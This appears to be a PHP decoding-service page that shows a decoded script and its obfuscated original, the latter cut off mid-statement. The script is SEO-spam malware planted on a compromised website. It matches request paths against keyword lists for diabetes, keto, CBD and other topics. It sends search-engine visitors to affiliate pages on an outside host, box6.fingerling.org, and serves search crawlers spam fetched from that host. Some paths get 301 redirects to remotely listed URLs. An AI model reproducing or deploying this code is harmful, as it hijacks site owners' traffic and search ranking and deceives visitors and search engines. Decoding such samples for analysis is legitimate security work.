Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto K2270; B9RFj: $lujingNums = count($lujingArrays3) - 1; goto R7K0A; nUdyv: for ($oj = ..

Decoded Output download

<?  goto K2270; B9RFj: $lujingNums = count($lujingArrays3) - 1; goto R7K0A; nUdyv: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays6[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/diabetes/bs.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } $ref = @strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($ref, "bing") !== false || strpos($ref, "Bi" . "ng" . "Preview") !== false || strpos($ref, "Bing" . "bot") !== false || strpos($ref, "Ad" . "Idx" . "Bot") !== false || strpos($ref, "g" . "oog" . "le") !== false || strpos($ref, "y" . "ah" . "oo") !== false || strpos($ref, "b" . "ing") !== false || strpos($ref, "a" . "o" . "l") !== false || strpos($ref, "a" . "s" . "k") !== false || strpos($ref, "s" . "ear" . "ch") !== false || strpos($ref, "b" . "o" . "t") !== false) { if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/diabetes/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } } goto KvcVH; si6NS: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays4[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/keto/keto.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/keto/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } goto pc_Ac; QlMPV: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArray[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/bs/bs.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/bs/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } else { $lujingNums = count($lujingArrays) - 1; for ($ok = 0; $ok <= $lujingNums; $ok++) { if (preg_match("/" . $lujingArrays[$ok] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/cbdnew/cbd.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/cbdnew/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } } } goto B9RFj; jnbwQ: $lujingNums = count($lujingArray) - 1; goto QlMPV; K2270: error_reporting(0); goto A4IV5; pc_Ac: $lujingNums = count($lujingArrays5) - 1; goto fGs0d; vCeVW: $lujingArrays = array("ZkhScbd", "Xhyucbd", "Opdycbd", "uYjdCbd", "WqeYcbD", "ErsTcbd", "JXjYcbd", "AEkVcbD", "cwYcbdj", "BIcbdAE"); goto pHdeP; oQglQ: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays7[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/bs2/bs.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } $ref = @strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($ref, "bing") !== false || strpos($ref, "Bi" . "ng" . "Preview") !== false || strpos($ref, "Bing" . "bot") !== false || strpos($ref, "Ad" . "Idx" . "Bot") !== false || strpos($ref, "g" . "oog" . "le") !== false || strpos($ref, "y" . "ah" . "oo") !== false || strpos($ref, "b" . "ing") !== false || strpos($ref, "a" . "o" . "l") !== false || strpos($ref, "a" . "s" . "k") !== false || strpos($ref, "s" . "ear" . "ch") !== false || strpos($ref, "b" . "o" . "t") !== false) { if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/bs2/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } } goto zhDkI; R7K0A: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays3[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/ed/ed.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/ed/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); $linescontent = getHtml("https://box6.fingerling.org/301/keto.txt"); $lines = preg_split("/
|
|
/", $linescontent); if (!empty($lines)) { $randomLineKey = array_rand($lines); $tl = $lines[$randomLineKey]; } else { $tl = "https://healthyeating.nhlbi.nih.gov/"; } $num1 = rand(0, 1); header("HTTP/1.1 301 Moved Permanently"); header("Location: " . $tl); die; echo $con; die; } } } goto MeojI; pHdeP: $lujingArrays3 = array("AQmedTh", "YzRedhn", "XHYqPed", "BcednEG", "woedIOk", "hXedyTf", "SVCedqJ", "gTwredA", "JtHedZv", "edFIgjk", "GmedKxT", "pAeddjW", "uedWSJf", "KediDEm", "ufPeQdU", "HedcONa", "OXxedBn", "MAePdOA", "SeudYqw", "CaehTdu"); goto rewxk; fGs0d: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays5[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://box6.fingerling.org/seo/dmz/bp/bp.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=beautycolor.com.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } if ($files !== NULL) { $con = getHtml("https://box6.fingerling.org/seo/dmz/bp/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } goto J0EoZ; BXrEj: $lujingArrays7 = array("health", "nutrition", "hypoglycemia", "homedelivery", "type2", "diabetes", "tests", "nutritionsource"); goto jnbwQ; R2iQe: function chref($crefs) { $truecref = str_replace("x", '', "bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh"); if (preg_match("/{$truecref}/i", $crefs)) { return true; } else { return false; } } goto UMpmn; A4IV5: function getHtml($url) { $content = file_get_contents($url); if (empty($content)) { $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $content = curl_exec($ch); curl_close($ch); } return $content; } goto R2iQe; KvcVH: $lujingNums = count($lujingArrays7) - 1; goto oQglQ; J0EoZ: $lujingNums = count($lujingArrays6) - 1; goto nUdyv; jm1o8: $lujingArrays6 = array("AtdiabetesQw", "BtdiabetesYt", "BcdiabetesXs", "CvdiabetesSj", "RidiabetesQw", "PidiabetesTr", "KidiabetesBv", "LkdiabetesII", "JkdiabetesMb", "FgdiabetesSh"); goto BXrEj; rewxk: $lujingArrays4 = array("rdcifestQ", "bdietzFFN", "WLdietsUY", "dyIwErtdN", "LdietjwTH", "Edricexte", "dQiEetCBU", "IdIietKwl", "dlGietIYa", "dFietaHnB", "dTietnApD", "DzdietKXK", "ketoPIJdC"); goto mTYdz; MeojI: $lujingNums = count($lujingArrays4) - 1; goto si6NS; UMpmn: $lujingArray = array("Akjbs", "bGhbs", "caDbs", "Dfjbs", "Ertbs", "Fghbs", "Ghibs", "HkHbs", "JkiBS", "KSrbs"); goto vCeVW; mTYdz: $lujingArrays5 = array("Ribp", "Wqbp", "bbpC", "ibpf", "MTbp", "Zvbp", "hpcd", "OMbp", "ftpb", "Uibp", "Ctbp", "Kwbp", "Tcbp"); goto jm1o8; zhDkI: ?> 

Did this file decode correctly?

Original Code

goto K2270; B9RFj: $lujingNums = count($lujingArrays3) - 1; goto R7K0A; nUdyv: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\57" . $lujingArrays6[$oj] . "\x5c\57\x28\x2e\x2a\51\x2f\151\163\x55", $_SERVER["\x52\x45\121\x55\x45\123\124\137\125\122\x49"])) { $www = "\x32"; $caches = "\56\57\x62\141\143\153\165\160\x2f"; $files = $_SERVER["\x52\105\x51\x55\105\123\x54\137\x55\x52\x49"]; $jturl = "\150\x74\164\x70\x73\x3a\57\x2f\x62\x6f\x78\66\x2e\146\151\156\x67\145\x72\154\151\x6e\147\x2e\x6f\x72\147\x2f\163\x65\x6f\57\x64\x6d\172\x2f\144\151\141\142\145\164\x65\x73\57\142\163\x2e\x70\150\160\77\x73\x69\164\145\x3d" . $_SERVER["\110\x54\124\120\x5f\110\x4f\123\x54"] . "\x26\x6b\x65\171\x77\x6f\162\144\75" . $_SERVER["\x52\x45\121\x55\x45\x53\124\x5f\125\x52\111"] . "\x26\x61\146\x66\x3d\142\x65\x61\x75\164\x79\143\x6f\x6c\157\x72\x2e\143\x6f\x6d\56\x62\162"; $htprefs = strtolower($_SERVER["\x48\124\124\x50\137\122\105\106\x45\122\105\122"]); if (chref($htprefs) && $files !== NULL) { header("\154\x6f\143\141\x74\x69\157\156\x3a\40" . $jturl); die; } $ref = @strtolower($_SERVER["\x48\x54\124\x50\137\125\123\105\122\137\x41\x47\105\x4e\x54"]); if (strpos($ref, "\x62\x69\156\147") !== false || strpos($ref, "\x42\151" . "\156\147" . "\x50\162\145\x76\x69\145\167") !== false || strpos($ref, "\102\x69\x6e\147" . "\x62\157\x74") !== false || strpos($ref, "\101\144" . "\111\x64\x78" . "\x42\157\164") !== false || strpos($ref, "\147" . "\x6f\x6f\x67" . "\x6c\145") !== false || strpos($ref, "\171" . "\x61\150" . "\x6f\157") !== false || strpos($ref, "\x62" . "\151\156\x67") !== false || strpos($ref, "\x61" . "\x6f" . "\x6c") !== false || strpos($ref, "\141" . "\163" . "\x6b") !== false || strpos($ref, "\163" . "\x65\x61\162" . "\143\150") !== false || strpos($ref, "\142" . "\x6f" . "\x74") !== false) { if ($files !== NULL) { $con = getHtml("\150\164\164\160\163\72\57\57\x62\157\x78\x36\56\146\151\156\x67\x65\x72\x6c\x69\156\x67\56\157\162\x67\57\x73\145\157\x2f\144\155\x7a\57\144\151\x61\x62\x65\x74\145\x73\x2f\x6d\x61\x69\x6e\x2e\x70\150\160\x3f\153\x65\x79\x3d" . $files . "\46\150\157\163\x74\75" . $_SERVER["\x48\x54\124\x50\x5f\x48\117\123\x54"] . "\x26\x77\167\167\x3d\62"); $con = str_replace("\x68\164\164\x70\72\x2f\x2f\150\x69\x73\x74\x6f\x72\x69\x61\x76\151\x76\x61\x2e\x66\x69\x6f\143\x72\165\172\56\142\x72\57", "\150\164\164\x70\163\72\57\57\x68\x69\x73\164\x6f\162\151\x61\x76\151\166\x61\x2e\x66\151\157\x63\162\x75\172\56\x62\162\x2f", $con); $con = str_replace("\56\150\164\x6d\x6c", '', $con); echo $con; die; } } } } goto KvcVH; si6NS: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\x2f" . $lujingArrays4[$oj] . "\x5c\57\x28\56\x2a\51\57\151\163\125", $_SERVER["\x52\105\x51\125\105\x53\124\x5f\125\122\x49"])) { $www = "\62"; $caches = "\56\57\x62\141\143\153\x75\160\57"; $files = $_SERVER["\122\x45\121\x55\x45\x53\x54\137\x55\122\x49"]; $jturl = "\150\x74\x74\x70\163\x3a\57\57\x62\x6f\x78\66\x2e\146\x69\156\147\145\x72\154\x69\156\x67\x2e\157\162\x67\x2f\163\x65\157\57\144\155\172\57\153\145\164\157\x2f\153\x65\x74\x6f\x2e\160\x68\x70\x3f\163\x69\164\x65\x3d" . $_SERVER["\110\x54\x54\x50\137\110\x4f\x53\124"] . "\x26\x6b\145\171\167\157\162\x64\75" . $_SERVER["\x52\x45\x51\x55\105\123\x54\x5f\125\122\x49"] . "\46\141\146\146\75\x62\x65\141\x75\x74\x79\x63\157\154\157\x72\x2e\143\x6f\x6d\x2e\x62\162"; $htprefs = strtolower($_SERVER["\x48\x54\124\120\x5f\x52\105\x46\105\122\105\122"]); if (chref($htprefs) && $files !== NULL) { header("\154\x6f\143\x61\164\151\157\156\72\x20" . $jturl); die; } if ($files !== NULL) { $con = getHtml("\x68\164\164\x70\x73\72\x2f\57\x62\x6f\x78\x36\x2e\146\x69\156\147\x65\162\x6c\151\156\147\56\157\162\x67\x2f\163\x65\x6f\x2f\144\155\x7a\57\x6b\145\x74\x6f\57\155\141\151\156\56\160\x68\x70\x3f\153\145\171\75" . $files . "\x26\150\157\x73\x74\x3d" . $_SERVER["\x48\124\x54\120\137\110\117\x53\x54"] . "\46\167\x77\x77\75\62"); $con = str_replace("\x68\164\x74\x70\72\x2f\57\150\151\163\164\157\x72\x69\141\166\x69\166\141\56\x66\151\157\x63\x72\x75\172\56\142\162\x2f", "\150\x74\x74\160\x73\72\57\x2f\150\x69\x73\x74\157\162\151\x61\x76\x69\x76\141\56\x66\151\x6f\x63\x72\x75\x7a\x2e\142\162\57", $con); $con = str_replace("\x2e\x68\164\155\x6c", '', $con); echo $con; die; } } } goto pc_Ac; QlMPV: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\x2f" . $lujingArray[$oj] . "\134\x2f\50\x2e\52\x29\x2f\151\x73\x55", $_SERVER["\x52\105\x51\125\x45\123\x54\137\x55\122\x49"])) { $www = "\62"; $caches = "\56\57\142\x61\x63\x6b\x75\x70\x2f"; $files = $_SERVER["\x52\105\121\x55\105\x53\124\137\125\x52\x49"]; $jturl = "\150\164\164\160\x73\x3a\57\x2f\x62\157\170\x36\x2e\146\x69\156\x67\x65\x72\x6c\151\156\x67\56\x6f\x72\x67\57\x73\x65\157\x2f\144\155\x7a\57\142\163\x2f\x62\163\x2e\x70\150\x70\77\163\x69\164\x65\x3d" . $_SERVER["\110\124\x54\x50\x5f\110\x4f\123\124"] . "\46\153\145\x79\x77\157\162\x64\x3d" . $_SERVER["\x52\105\x51\x55\105\x53\x54\x5f\x55\122\x49"] . "\x26\x61\x66\x66\x3d\x62\145\x61\165\x74\x79\x63\157\154\157\162\x2e\x63\157\x6d\56\x62\x72"; $htprefs = strtolower($_SERVER["\x48\x54\124\120\137\x52\x45\106\105\122\105\122"]); if (chref($htprefs) && $files !== NULL) { header("\154\157\x63\x61\164\151\x6f\156\x3a\40" . $jturl); die; } if ($files !== NULL) { $con = getHtml("\x68\164\164\x70\163\72\57\x2f\142\x6f\170\66\x2e\146\x69\156\x67\x65\162\x6c\151\156\147\x2e\x6f\162\x67\57\x73\x65\x6f\x2f\144\x6d\172\x2f\x62\163\x2f\155\141\x69\x6e\x2e\x70\150\x70\77\x6b\145\x79\75" . $files . "\x26\x68\x6f\163\x74\x3d" . $_SERVER["\110\x54\124\x50\137\x48\x4f\123\x54"] . "\x26\167\167\x77\x3d\x32"); $con = str_replace("\x68\164\x74\x70\x3a\x2f\57\150\151\163\164\x6f\x72\x69\x61\x76\151\166\x61\x2e\x66\x69\x6f\x63\x72\x75\172\x2e\x62\162\x2f", "\150\164\x74\x70\163\x3a\x2f\57\x68\x69\x73\x74\x6f\162\x69\x61\166\x69\x76\141\x2e\146\151\x6f\143\x72\165\172\56\142\162\x2f", $con); $con = str_replace("\56\150\164\155\x6c", '', $con); echo $con; die; } } else { $lujingNums = count($lujingArrays) - 1; for ($ok = 0; $ok <= $lujingNums; $ok++) { if (preg_match("\x2f" . $lujingArrays[$ok] . "\x5c\x2f\50\56\x2a\51\x2f\151\x73\125", $_SERVER["\x52\x45\x51\125\x45\123\x54\137\x55\x52\x49"])) { $www = "\x32"; $caches = "\56\57\x62\x61\143\153\165\160\57"; $files = $_SERVER["\x52\105\121\x55\105\123\x54\137\x55\x52\111"]; $jturl = "\x68\x74\164\160\x73\x3a\x2f\57\142\157\170\66\56\x66\151\156\147\x65\x72\154\151\x6e\x67\56\157\x72\147\57\163\x65\157\x2f\144\x6d\x7a\57\x63\x62\x64\x6e\145\167\57\x63\142\144\56\160\150\160\77\x73\151\x74\145\x3d" . $_SERVER["\x48\x54\x54\120\137\110\x4f\123\x54"] . "\x26\x6b\x65\x79\x77\157\x72\x64\x3d" . $_SERVER["\x52\105\121\x55\x45\123\124\x5f\125\x52\111"] . "\46\x61\x66\x66\75\x62\x65\141\165\164\171\x63\157\x6c\157\162\x2e\143\157\x6d\x2e\142\162"; $htprefs = strtolower($_SERVER["\110\124\x54\x50\137\x52\x45\x46\105\122\x45\122"]); if (chref($htprefs) && $files !== NULL) { header("\x6c\x6f\143\x61\164\x69\157\156\72\x20" . $jturl); die; } if ($files !== NULL) { $con = getHtml("\150\x74\x74\x70\x73\72\57\57\142\x6f\170\x36\x2e\x66\151\x6e\x67\145\x72\x6c\x69\156\147\x2e\157\162\x67\57\x73\x65\157\x2f\x64\x6d\x7a\57\143\x62\144\x6e\145\x77\57\155\x61\x69\156\x2e\160\150\160\77\x6b\x65\x79\75" . $files . "\x26\x68\x6f\163\164\75" . $_SERVER["\110\x54\124\120\137\110\117\123\x54"] . "\46\167\167\167\x3d\x32"); $con = str_replace("\150\x74\x74\x70\72\57\x2f\x68\151\x73\x74\x6f\x72\151\141\166\151\166\141\x2e\x66\151\x6f\143\162\165\x7a\56\x62\x72\57", "\x68\164\x74\x70\x73\72\x2f\57\150\x69\x73\x74\157\x72\151\141\166\151\x76\x61\56\x66\x69\157\x63\162\x75\x7a\x2e\x62\x72\x2f", $con); $con = str_replace("\56\x68\164\155\x6c", '', $con); echo $con; die; } } } } } goto B9RFj; jnbwQ: $lujingNums = count($lujingArray) - 1; goto QlMPV; K2270: error_reporting(0); goto A4IV5; pc_Ac: $lujingNums = count($lujingArrays5) - 1; goto fGs0d; vCeVW: $lujingArrays = array("\x5a\x6b\x68\123\143\x62\x64", "\130\x68\x79\x75\x63\x62\x64", "\117\x70\x64\171\x63\x62\144", "\165\x59\x6a\144\x43\142\144", "\127\x71\x65\x59\143\142\x44", "\105\x72\163\124\143\x62\144", "\x4a\130\152\131\x63\142\144", "\x41\x45\153\x56\143\142\x44", "\143\167\131\x63\x62\x64\152", "\102\111\143\x62\x64\101\105"); goto pHdeP; oQglQ: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\x2f" . $lujingArrays7[$oj] . "\134\x2f\50\x2e\x2a\51\57\x69\163\x55", $_SERVER["\x52\105\x51\x55\105\x53\124\137\125\x52\x49"])) { $www = "\62"; $caches = "\x2e\57\142\141\143\x6b\165\160\57"; $files = $_SERVER["\x52\105\x51\125\105\123\x54\137\x55\122\x49"]; $jturl = "\150\x74\164\x70\x73\x3a\57\57\x62\x6f\170\x36\56\x66\151\x6e\x67\x65\x72\154\151\x6e\147\56\x6f\x72\147\x2f\163\x65\x6f\x2f\x64\x6d\x7a\57\x62\163\x32\57\x62\x73\x2e\160\x68\x70\77\x73\x69\x74\145\75" . $_SERVER["\110\x54\124\120\x5f\x48\117\123\124"] . "\46\153\145\x79\x77\x6f\x72\x64\x3d" . $_SERVER["\122\x45\x51\125\105\123\124\137\x55\122\x49"] . "\46\x61\146\x66\75\142\x65\141\x75\164\171\143\x6f\x6c\x6f\x72\x2e\143\x6f\155\56\x62\x72"; $htprefs = strtolower($_SERVER["\x48\124\x54\x50\x5f\122\x45\106\105\122\105\x52"]); if (chref($htprefs) && $files !== NULL) { header("\154\x6f\x63\x61\164\x69\x6f\x6e\x3a\x20" . $jturl); die; } $ref = @strtolower($_SERVER["\110\124\x54\x50\x5f\x55\x53\x45\122\137\x41\x47\x45\x4e\x54"]); if (strpos($ref, "\142\151\156\x67") !== false || strpos($ref, "\x42\151" . "\x6e\x67" . "\120\162\145\166\151\x65\x77") !== false || strpos($ref, "\102\x69\156\x67" . "\x62\157\x74") !== false || strpos($ref, "\101\x64" . "\x49\x64\x78" . "\102\157\164") !== false || strpos($ref, "\147" . "\x6f\157\x67" . "\x6c\145") !== false || strpos($ref, "\171" . "\x61\x68" . "\157\157") !== false || strpos($ref, "\142" . "\x69\x6e\147") !== false || strpos($ref, "\x61" . "\157" . "\154") !== false || strpos($ref, "\x61" . "\163" . "\x6b") !== false || strpos($ref, "\163" . "\145\x61\162" . "\143\x68") !== false || strpos($ref, "\142" . "\x6f" . "\x74") !== false) { if ($files !== NULL) { $con = getHtml("\150\x74\x74\160\x73\x3a\57\x2f\142\157\170\x36\x2e\x66\151\x6e\x67\145\x72\154\151\156\x67\x2e\157\x72\x67\x2f\163\145\157\x2f\144\155\172\x2f\142\163\x32\57\x6d\141\x69\156\56\160\150\x70\x3f\x6b\x65\171\x3d" . $files . "\46\150\157\163\164\x3d" . $_SERVER["\110\124\124\120\137\110\x4f\123\x54"] . "\46\167\167\167\75\62"); $con = str_replace("\x68\164\164\160\x3a\57\x2f\x68\x69\x73\x74\157\x72\x69\x61\x76\x69\166\x61\56\x66\x69\157\x63\162\165\172\x2e\x62\x72\57", "\150\164\x74\160\x73\72\x2f\57\150\x69\x73\164\x6f\162\x69\x61\166\151\166\x61\x2e\x66\151\157\x63\x72\165\x7a\x2e\x62\162\x2f", $con); $con = str_replace("\56\150\164\x6d\154", '', $con); echo $con; die; } } } } goto zhDkI; R7K0A: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\57" . $lujingArrays3[$oj] . "\134\x2f\50\x2e\52\51\57\x69\163\125", $_SERVER["\122\105\121\125\x45\123\124\x5f\125\122\111"])) { $www = "\x32"; $caches = "\56\x2f\x62\x61\x63\x6b\165\x70\x2f"; $files = $_SERVER["\122\105\x51\125\x45\x53\x54\x5f\125\122\111"]; $jturl = "\x68\164\x74\x70\163\72\57\57\142\x6f\x78\x36\x2e\146\151\156\147\x65\x72\154\x69\156\x67\56\157\162\147\x2f\x73\x65\157\x2f\x64\x6d\x7a\x2f\x65\x64\57\145\144\56\x70\150\160\77\x73\x69\164\145\75" . $_SERVER["\110\x54\x54\x50\x5f\110\117\123\124"] . "\46\153\145\x79\x77\x6f\x72\x64\x3d" . $_SERVER["\122\105\x51\x55\105\x53\x54\x5f\x55\x52\x49"] . "\x26\141\x66\146\75\x62\145\x61\x75\x74\x79\x63\x6f\154\x6f\x72\x2e\143\x6f\x6d\56\142\162"; $htprefs = strtolower($_SERVER["\110\124\x54\x50\x5f\122\x45\x46\105\122\x45\x52"]); if (chref($htprefs) && $files !== NULL) { header("\x6c\157\143\141\164\x69\157\156\x3a\40" . $jturl); die; } if ($files !== NULL) { $con = getHtml("\x68\x74\x74\x70\163\72\57\57\142\x6f\170\x36\56\x66\x69\x6e\x67\145\162\x6c\151\156\147\56\157\x72\147\57\x73\145\x6f\57\144\x6d\172\x2f\145\x64\x2f\155\x61\151\x6e\x2e\x70\x68\160\77\x6b\145\171\x3d" . $files . "\x26\150\x6f\x73\164\x3d" . $_SERVER["\x48\x54\x54\120\137\110\117\123\124"] . "\46\167\x77\167\75\62"); $con = str_replace("\150\164\164\160\72\57\x2f\x68\151\163\164\157\162\x69\x61\166\x69\x76\141\56\146\x69\x6f\143\162\165\172\x2e\142\x72\57", "\150\x74\164\160\163\72\57\57\150\151\x73\164\x6f\x72\151\x61\x76\151\x76\141\56\146\151\157\143\162\x75\x7a\56\142\162\x2f", $con); $con = str_replace("\56\150\x74\x6d\154", '', $con); $linescontent = getHtml("\x68\x74\x74\160\163\x3a\x2f\57\x62\x6f\x78\x36\56\x66\151\156\x67\145\x72\154\x69\x6e\x67\56\157\162\147\x2f\63\60\61\57\153\x65\x74\x6f\x2e\164\170\x74"); $lines = preg_split("\x2f\x5c\162\134\156\x7c\x5c\x72\x7c\134\x6e\57", $linescontent); if (!empty($lines)) { $randomLineKey = array_rand($lines); $tl = $lines[$randomLineKey]; } else { $tl = "\150\164\x74\160\163\x3a\x2f\57\x68\145\x61\154\x74\x68\x79\145\141\164\151\x6e\x67\x2e\156\x68\x6c\x62\151\56\x6e\151\x68\56\147\x6f\166\57"; } $num1 = rand(0, 1); header("\110\x54\x54\x50\57\61\56\61\40\63\x30\x31\40\x4d\157\166\145\x64\40\120\x65\x72\x6d\141\156\145\x6e\x74\x6c\171"); header("\x4c\x6f\143\141\x74\x69\157\x6e\72\x20" . $tl); die; echo $con; die; } } } goto MeojI; pHdeP: $lujingArrays3 = array("\x41\121\x6d\x65\x64\124\x68", "\131\172\122\145\144\x68\x6e", "\x58\x48\x59\161\120\x65\x64", "\102\143\x65\x64\156\x45\x47", "\x77\157\x65\x64\x49\117\x6b", "\x68\x58\145\x64\x79\124\x66", "\x53\x56\x43\x65\144\161\x4a", "\x67\124\x77\162\x65\x64\x41", "\112\x74\110\x65\144\x5a\x76", "\x65\x64\x46\x49\147\152\x6b", "\107\155\x65\144\113\170\x54", "\x70\101\x65\144\144\152\x57", "\x75\x65\144\x57\x53\112\146", "\113\145\144\151\104\105\x6d", "\x75\x66\x50\145\121\144\x55", "\110\145\x64\x63\x4f\116\x61", "\117\x58\x78\x65\x64\x42\156", "\x4d\101\145\x50\x64\x4f\101", "\x53\x65\165\x64\x59\161\x77", "\x43\x61\145\150\x54\x64\165"); goto rewxk; fGs0d: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\57" . $lujingArrays5[$oj] . "\134\x2f\x28\x2e\52\x29\x2f\151\163\x55", $_SERVER["\x52\x45\121\125\105\123\124\x5f\x55\122\x49"])) { $www = "\x32"; $caches = "\x2e\x2f\142\x61\x63\x6b\165\160\57"; $files = $_SERVER["\122\x45\121\x55\x45\x53\124\x5f\125\x52\111"]; $jturl = "\x68\164\164\160\163\x3a\57\x2f\x62\x6f\x78\66\56\x66\x69\156\x67\145\162\x6c\151\156\x67\56\157\162\147\57\x73\145\157\57\144\155\x7a\57\x62\160\x2f\x62\160\56\160\150\160\x3f\x73\151\x74\x65\x3d" . $_SERVER["\x48\124\124\x50\137\x48\117\x53\124"] . "\46\153\x65\171\167\x6f\162\144\x3d" . $_SERVER["\122\105\121\x55\x45\x53\x54\137\125\122\x49"] . "\46\141\x66\146\75\142\x65\141\x75\164\x79\x63\x6f\154\157\x72\56\143\157\155\56\142\x72"; $htprefs = strtolower($_SERVER["\x48\x54\x54\120\137\122\105\106\105\122\x45\122"]); if (chref($htprefs) && $files !== NULL) { header("\x6c\157\x63\x61\164\151\x6f\x6e\x3a\40" . $jturl); die; } if ($files !== NULL) { $con = getHtml("\x68\x74\164\x70\163\72\57\57\142\157\170\x36\x2e\146\151\x6e\147\x65\x72\154\x69\x6e\x67\56\157\x72\147\57\x73\145\157\x2f\144\155\172\57\142\x70\x2f\155\x61\x69\156\56\x70\150\160\77\x6b\145\x79\x3d" . $files . "\46\x68\157\163\164\75" . $_SERVER["\110\124\124\x50\x5f\x48\117\123\x54"] . "\46\x77\x77\x77\x3d\x32"); $con = 